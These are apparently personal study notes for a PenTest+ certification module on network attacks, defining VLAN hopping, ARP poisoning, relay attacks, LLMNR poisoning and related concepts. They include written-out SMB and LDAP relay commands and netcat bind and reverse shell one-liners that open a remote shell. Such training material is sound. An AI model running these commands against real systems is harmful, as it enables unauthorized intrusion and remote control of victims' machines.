PenTest+ Module 17 - Network Attacks

Network Attacks

Exploiting the network infrastructure to gain unauthorized access, extract data, or disrupt normal operations

Stress Testing

A software testing method that evaluates how software performs under extreme load

Packet Storm (Broadcast / Network Storm)

Any large increase in network traffic that’s directed at a given target

Character Generator Protocol

Used in testing, debugging, and measuring the network

CHARGEN operates over either TCP or UDP using port 19. Sends arbitrary characters to the host until that host terminates the session

Segmentation Bypassing

Refers to techniques used to circumvent network segmentation controls

Network Segmentation

A security practice that divides a network into smaller segments to limit the spread of potential attacks and to contain threats

Virtual Local Area Network (VLAN) Hopping

A technique used by attackers to gain access to network segments they should not have access to by exploiting vulnerabilities in the VLAN configuration

VLAN

Used to segment network traffic at the data link layer (layer 2), creating isolated network segments on the same physical network

Switch Spoofing

An attacker configures device to mimic a trunking switch which is a network switch that can carry multiple VLANs over a single physical connection (port or link) between switches

Double Tagging

An attacker sends packets with two VLAN tags

Multihomed Host

A device that has multiple network interfaces, each connected to different networks

Media Access Control (MAC) Address

Means for identifying a device physically and allowing it to operate on a logical topology. Basically a physical hardware address

First 3 hex values are the vendor code

Second 3 hex values are used to represent the exact machine the address belongs to

Layer 2 devices use MAC addresses to associate which device is connected to which physical port on a given switch

MAC spoofing is really easy. Most operating systems allow you to overwrite the physical burned in MAC address

Allowlist

Allowed to connect

Blocklist

Now allowed to connect

Network Access Control (NAC)

Technology used to keep unauthorized users or devices from accessing a private network

Persistent Agents

Pieces of software that are installed on the device requesting access to the network

Non-persistent Agents

Require the user to connect to the network

Agentless NAC Solutions

Install the scanning engine on the domain controller instead of on the endpoint device

Also called volatile solutions because they completely run in the volatile RAM of the device

On-Path Attack

An attack where the penetration tester puts their workstation logically between two hosts during the communication

Literally just MiTM renamed

Replay Attack

Occurs when valid data is captured by the attacker and repeated immediately or delayed and then repeated

Happens when an attacker inserts themselves between the two hosts

Downgrade Attack

Occurs when an attacker attempts to have a client or server abandon a higher security mode in favor of a lower security mode

SSL Stripping

Occurs when an attacker tricks the encryption application into presenting the user with an HTTP connection instead of an HTTPS connection

Certificate Services

Used to manage digital certificates which are essential for establishing secure communications through encryption and authentication

Attacks on certificate services target weaknesses in digital certificate management

Exploiting Misconfigured Services

Kind of self explanatory

An example is directory listings enabled for a webserver

Share Enumeration

Discovering and listing shared resources on a network

Can be done with smbclient

Packet Crafting

Involves creating custom network packets to test devices, simulate attacks, or explore vulnerabilities

SMB Relay Attack

Exploits SMB to intercept and relay authentication, gaining unauthorized access to systems

1. Configure the environment smbrelayx.py -h [Attacker IP] -t [Target IP] -u [User]

2. Wait for a connection

3. Attempt to gain access

LDAP Relay Attack

Similar to an SMB relay attack but targets LDAP authentication

ntlmrelayx.py -t ldap://[Target IP] -smb2support

Scapy

Offers flexibility for crafting custom packets at a lower level

Netcat (nc)

Command-line utility for reading and writing raw data over a network connection

Bind Shell

A shell where a listening port is opened on the victim’s machine

Attacker —(connects to)→ Victim

Less effective due to firewalls (block incoming traffic, also routing stuff. Helps though because always listening)

Reverse Shell

Attacker installs a listener on their own workstation and configures a listening port

Victim —(connects to)→ Attacker

Can go through firewalls (outbound traffic is usually allowed)

Netcat Bindshell

nc -lp <port> -e <cmd> on victim

Connect with nc <IP> <port> from attacker

Netcat Reverse Shell

nc -nvlp <port> on attacker (can also just only do lp)

Connect with nc <IP> <port> -e <cmd> from the victim

Default Credentials

Are preconfigured usernames and passwords that come with many hardware devices and software applications

Link-Local Multicast Name Resolution (LLMNR)

Based on the DNS packet formatting and allows both IPV4 and IPV6 hosts to perform name resolution on the host if they are on the same local link

NetBIOS Name Service (NBNS or NBT-NS)

Part of the NetBIOS-over-TCP protocol suite that is used as a type of name resolution inside the internal network to translate internal names to IP addresses

Responder

A command-line tool in Kali Linux that is used to poison NetBIOS, LLMNR, and mDNS name resolution requests

Address Resolution Protocol (ARP)

Occurs automatically on a given local area network to identify which workstation is currently assigned a particular IP address at any given time

Purpose of ARP is to create a binding between an IP address and a MAC address inside the LAN using Layer 2 or the data link layer

ARP Spoofing

Sending falsified ARP messages over a local area network to get the ARP caches to dynamically update with new information

Like if you sent a letter and put the address as someone else’s address, and your recipient updates their records to have that new address as your address

ARP Poisoning

Attack that exploits the IP address to MAC resolution in a network to steal, modify, or redirect frames within that local area network

Metasploit

An open-source penetration testing framework that provides a comprehensive set of tools for exploiting vulnerabilities in systems, networks, and applications

Quickly identify and exploit vulnerabilities, automates a lot of the exploitation process, makes it easy to customize and extend its capabilities

MSFvenom

A standalone payload generator and encoder tool that is part of the Metasploit framework

Combines the functionality of MSFpayload and MSFencode to generate and encode payloads in a single step

Impacket

Used to craft custom network packets enabling attacks like SMB or LDP relay